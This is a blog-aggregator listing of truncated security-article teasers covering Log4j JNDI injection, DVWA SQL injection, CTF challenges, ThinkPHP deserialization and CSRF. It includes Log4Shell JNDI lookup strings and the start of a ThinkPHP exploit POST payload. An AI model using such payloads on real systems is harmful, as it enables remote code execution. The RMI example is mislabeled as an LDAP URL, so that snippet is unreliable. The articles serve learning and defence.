Programmer Think

Vulnerability principle 1. The attack disguises a request body containing JNDI executable services. Here I mainly try LDAP and RMI. The request URL is as follows: LADP: ${jndi:ldap://127.0.0.1:1389/hello}RMI: ${jndi:ldap://127.0.0.1:1389/hello} 2. When the application happens to output the request header or input parameter log, it will ...

catalogue Low Medium High  Impossible SQL Injection (blind), that is, SQL blind injection, is different from general injection in that the general injection attacker can directly see the execution result of the injection statement from the page, while during blind injection, the attacker usually cannot obtain the execution result from the ...

Catalog Low  Medium  High Impossible Insecure CAPTCHA, which means unsafe authentication code, is short for Completely Automated Public Turing Test to Tell Computers and Humans Apart, a Turing test that automatically distinguishes computers from humans. However, I think it would be better to call the content of this module an unsafe verif ...

preface How to evaluate the 2021 dai Lian cup?, My evaluation is "immortals fight, mortals suffer". Misc Misc1-decodemaster After getting the title, open the word file and find that it is a string of random codes with the font of Wingdings 2 Modify the font and find that the font can be displayed normally when it is in bold ( ...

background Recently, the project has been launched, and Party A requires to pass the safety inspection before acceptance. Therefore, a series of safety reinforcement has been carried out for the system according to the scanning results. This paper introduces some common safety problems and protection strategies, and provides corresponding solut ...

ThinkPHP5.0.24_ Analysis of deserialization vulnerability in Linux ThinkPHP5.0.24Vulnerability code<?php namespace app\index\controller; class Index { public function test01(){ $code = $_POST['code']; unserialize(base64_decode($code)); } } payload/index.php/index/index/test01 POST code=TzoyNzoidGhpbmtccHJvY2Vzc1xwa ...

Summary seen by boss General PHP interviews will ask about front-end knowledge, especially VUE. You need to know some front-end content PHP: What are CSRF and XSS attacks answer: 1.CSRF Basic concept, abbreviation and full name of CSRF(Cross-site request forgery) Cross-site request forgery 2.CSRF Attack principle of User is a website A ...

catalogue web254 web255 web256 web257 web258 web259 web260 web261 web262 web263 web264 web265 web266 web267 web254 <?php ​ /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date:   2020-12-02 17:44:47 # @Last Modified by:   h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com ​ */ ​ ...

1, Introduction to License License is the copyright license, which is generally used for the access license certificate provided by the charging software to the paying user. According to different application deployment locations, it can be divided into the following two situations: The application is deployed on the developer's own ECs. In ...

On cross domain vulnerabilities of JSONP CSRF (Cross site request forgery) is an attack method that hijacks the user to perform unintentional operations on the currently logged in Web application. Compared with XSS, XSS uses the trust of the website to the user, and CSRF uses the trust of the website to the user's Web browser. When it comes t ...